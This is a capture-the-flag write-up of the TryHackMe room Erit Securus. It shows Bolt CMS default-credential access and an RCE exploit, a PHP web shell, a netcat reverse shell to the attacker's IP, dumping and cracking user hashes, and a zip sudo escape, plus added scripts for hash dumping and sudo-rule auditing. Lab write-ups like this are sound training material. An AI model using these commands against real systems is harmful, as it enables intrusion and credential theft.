Today we are going to solve a TryHackMe challenge called Erit Securus, designed by 4nqr34z. You can get into the room .
Hack everyday
So, without wasting too much time, let's get in.
Level : Easy
Attacking Strategy
- Enumeration
- Rustscan
- Web enumeration
- Exploitation of Bolt CMS
- Remote code execution vulnerability
- Privilege escalation
- Sudo rights
Enumeration
There is a saying in this field: the more you search, the more you get.
We start our initial scan with Rustscan, since it finds open ports much faster than nmap; everything after the double dash is handed to nmap, so -A runs service/version detection and default scripts on the ports Rustscan found.
rustscan 10.10.99.40 --ulimit 5000 -- -A | tee nmap_result.txt


In the result we can see that ports 22 and 80 are open. From experience, I only touch SSH when no other door is open, so let's enumerate port 80 first.
Web Enumeration
Opening port 80 in the browser, we find a website built with Bolt CMS. Time to switch on the hacker vision and start digging for login pages, help pages or any other leak. After some time (and some headache) we find the login page at the path documented on the official Bolt CMS site.

Searching the official documentation

At the login page we try the default credentials admin : password. They work, and we are in the admin panel of the CMS.


From here we dig for more information, above all the version and a way to upload some kind of reverse shell. The CMS version turns out to be 3.7.0, which has a known authenticated remote code execution vulnerability, and a Google search gives us a working exploit.

(We also searched on searchsploit, but that code was not working.)

Exploitation
With the exploit from GitHub it is time to fire up the gun. The exploit takes the target URL and the admin credentials we already have, and after it runs successfully we get remote code execution:
python exploit.py http://10.10.99.40 admin password


Here we got stuck for a moment: we had not noticed that there is no netcat on the target machine, so we have to get one onto it somehow.
First we drop a simple PHP web shell on the target, so that we can run system commands through the c GET parameter:
echo '<?php system($_GET["c"]); ?>' > c1.php

With the web shell in place, we create a symbolic link to our local netcat binary and serve it with Python's HTTP server so the target can download it.

Now we can call that address through the PHP web shell to fetch the binary onto the target.


With netcat on the target, we start a reverse shell to our listener on port 4242 (this needs a netcat build that supports -e):
./nc -e /bin/sh 10.11.3.131 4242

We get our reverse shell. After upgrading it to a proper interactive shell, we move on to privilege escalation.

Privilege Escalation
We have access; now the main goal is to get root somehow. Before that, let's do some enumeration.
While searching the file system, one thing that caught my eye was the application's database. User data can often be dumped from it and reused, so let's dump the database:
cd /var/www/html/app/database
ls -la
sqlite3 bolt.db
.tables
SELECT * from bolt_users;

We get the password hashes of some users, and with john we can crack them easily.
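The sqlite3 session above does the job interactively; when the shell is a bare reverse shell it is handy to script the same steps and write the hashes straight into the user:hash format john reads. The following is an added example, not the writeup's code. The table and column names (bolt_users, username, password) match the SELECT above; the mapping of the $2y$ prefix to john's bcrypt format assumes Bolt 3 stores PHP password_hash() output. The rows in sample_db() are constructed for illustration, not the challenge's data.

```python
"""Dump user hashes from a Bolt-style SQLite database in john's user:hash form.

Added example, not from the original writeup. Table/column names follow the
writeup's query; the hash-format table is an assumption (Bolt 3 -> bcrypt);
sample_db() holds constructed rows, not real challenge data.
"""
import re
import sqlite3

# Hash prefix -> john --format (short excerpt of common crypt(3)-style schemes)
HASH_FORMATS = {
    "$2y$": "bcrypt", "$2a$": "bcrypt", "$2b$": "bcrypt",
    "$6$": "sha512crypt", "$5$": "sha256crypt", "$1$": "md5crypt",
}
_IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def _ident(name):
    """Table/column names cannot be bound as SQL parameters, so validate them
    as plain identifiers before interpolating them into a statement."""
    if not _IDENT.match(name):
        raise ValueError("bad identifier: %r" % name)
    return name


def list_tables(conn):
    """Same information as sqlite3's .tables command, via sqlite_master."""
    rows = conn.execute("SELECT name FROM sqlite_master WHERE type='table' ORDER BY name")
    return [r[0] for r in rows]


def john_format(h):
    """Guess john's --format from the hash prefix; None means let john autodetect."""
    for prefix, fmt in HASH_FORMATS.items():
        if h.startswith(prefix):
            return fmt
    return None


def dump_users(conn, table="bolt_users", user_col="username", pw_col="password"):
    """Return (username, hash, john_format) for every row that has a hash set."""
    t, u, p = _ident(table), _ident(user_col), _ident(pw_col)
    cols = {row[1] for row in conn.execute("PRAGMA table_info(%s)" % t)}
    missing = {u, p} - cols
    if missing:
        raise KeyError("%s lacks columns %s" % (t, sorted(missing)))
    sql = "SELECT %s, %s FROM %s WHERE %s IS NOT NULL AND %s != '' ORDER BY rowid" % (u, p, t, p, p)
    return [(name, h, john_format(h)) for name, h in conn.execute(sql)]


def john_lines(entries):
    """john reads one user:hash per line; the format hint goes on the command line."""
    return ["%s:%s" % (name, h) for name, h, _ in entries]


def sample_db():
    """Constructed stand-in for /var/www/html/app/database/bolt.db (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bolt_users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, email TEXT, enabled INTEGER)")
    conn.executemany(
        "INSERT INTO bolt_users (username, password, email, enabled) VALUES (?, ?, ?, ?)",
        [   # bcrypt-shaped placeholders (60 chars), not real hashes
            ("admin", "$2y$10$" + "A" * 53, "admin@example.invalid", 1),
            ("wileec", "$2y$10$" + "B" * 53, "wileec@example.invalid", 1),
            ("disabled", None, "old@example.invalid", 0),
        ])
    conn.execute("CREATE TABLE bolt_log_change (id INTEGER PRIMARY KEY)")
    return conn


if __name__ == "__main__":
    db = sample_db()   # on the target: sqlite3.connect("bolt.db")
    print("tables:", list_tables(db))
    users = dump_users(db)
    for line in john_lines(users):
        print(line)
    fmts = {f for _, _, f in users if f}
    print("john --format=%s hashes.txt" % (fmts.pop() if len(fmts) == 1 else "<mixed>"))
```

Passing --format explicitly matters for bcrypt: john's autodetection can pick a different $2 variant, and bcrypt is slow enough that a wrong format wastes a long run.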

After cracking a password, we look for matching users in the passwd file:
cat /etc/passwd

Here we find the user wileec. We switch to this user with the cracked password and get our first flag in wileec's home directory.

We also discover the user's SSH private key under .ssh, so we download it to connect through it, and we check the sudo rights of the user.

Connecting to the target over SSH with the private key, we discover that there is another network reachable from this box.

But before diving into that, let's look at other vectors such as sudoers permissions, SUID binaries, etc.
Checking the sudoers rules for our user, we see that wileec can run the zip command as jsmith with sudo, so without a second thought we exploit this to get jsmith's rights.

Here we take the help of GTFOBins for the exploitation method: zip's -T flag tests the new archive, and -TT lets us name the command used for that test instead of unzip, so the command runs as jsmith. The trailing /bin/bash just upgrades the resulting sh to bash:
TF=$(mktemp -u)
sudo -u jsmith /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
/bin/bash
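The zip rule is one instance of a general problem: any sudo rule whose binary has a documented shell escape is effectively a rule granting a shell as the run-as user. The following is an added example, not from the writeup, of the check a practitioner runs over sudo -l output to spot such rules before reaching for GTFOBins by hand. SAMPLE_SUDO_L is constructed to resemble the output on this box (the hostname, the NOPASSWD tag and the second rule are made up), and SHELL_ESCAPES is a small excerpt of the binaries listed in GTFOBins' sudo section.

```python
"""Flag sudo -l rules that hand out a shell, the way the zip rule above does.

Added example, not from the original writeup. SAMPLE_SUDO_L is constructed
(hostname, NOPASSWD tag and the systemctl/ls rule are invented); the escape
list is a short excerpt of GTFOBins' sudo entries.
"""
import re

# Binaries whose GTFOBins sudo page documents a shell escape (excerpt)
SHELL_ESCAPES = {
    "zip", "tar", "find", "vim", "vi", "less", "more", "man", "awk",
    "perl", "python", "python3", "env", "bash", "sh", "nano", "git", "ftp",
}

# Constructed sample of `sudo -l` output, modelled on the box's wileec -> jsmith rule
SAMPLE_SUDO_L = r"""
Matching Defaults entries for wileec on erit-securus:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User wileec may run the following commands on erit-securus:
    (jsmith) /usr/bin/zip
    (root) NOPASSWD: /usr/bin/systemctl status apache2, /bin/ls
"""

# "(runas[:group]) [TAG: ...] cmd[, cmd...]"
_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return (runas_user, tags, command) for each rule listed after the
    'may run the following commands' header; Defaults lines are skipped."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = _RULE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()       # "(user : group)" -> user
        tags = {t.strip(":") for t in m.group("tags").split() if t}
        for cmd in m.group("cmds").split(","):               # several commands per line
            rules.append((runas, tags, cmd.strip()))
    return rules


def risky_rules(rules):
    """Flag rules that are ALL, or whose binary is on the escape list."""
    findings = []
    for runas, tags, cmd in rules:
        binary = "ALL" if cmd == "ALL" else cmd.split()[0]
        name = binary.rsplit("/", 1)[-1]
        if cmd == "ALL":
            reason = "unrestricted"
        elif name in SHELL_ESCAPES:
            reason = "shell escape (see GTFOBins: %s)" % name
        else:
            continue
        findings.append({"runas": runas, "binary": binary,
                         "nopasswd": "NOPASSWD" in tags, "reason": reason})
    return findings


if __name__ == "__main__":
    # On a target: import subprocess; text = subprocess.run(["sudo", "-l"], ...).stdout
    for finding in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(finding)
```

The same parser serves the defensive side: run it against sudoers audits to catch rules like this one before an attacker does, and treat a match as equivalent to granting a shell as the run-as user.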

Again we check the sudo rights for this new user, and again there is an entry we can hit.

Here we get our root flag.
Hopefully you liked the writeup. For any query you can contact us at [email protected]
You can also DM us on Twitter with questions.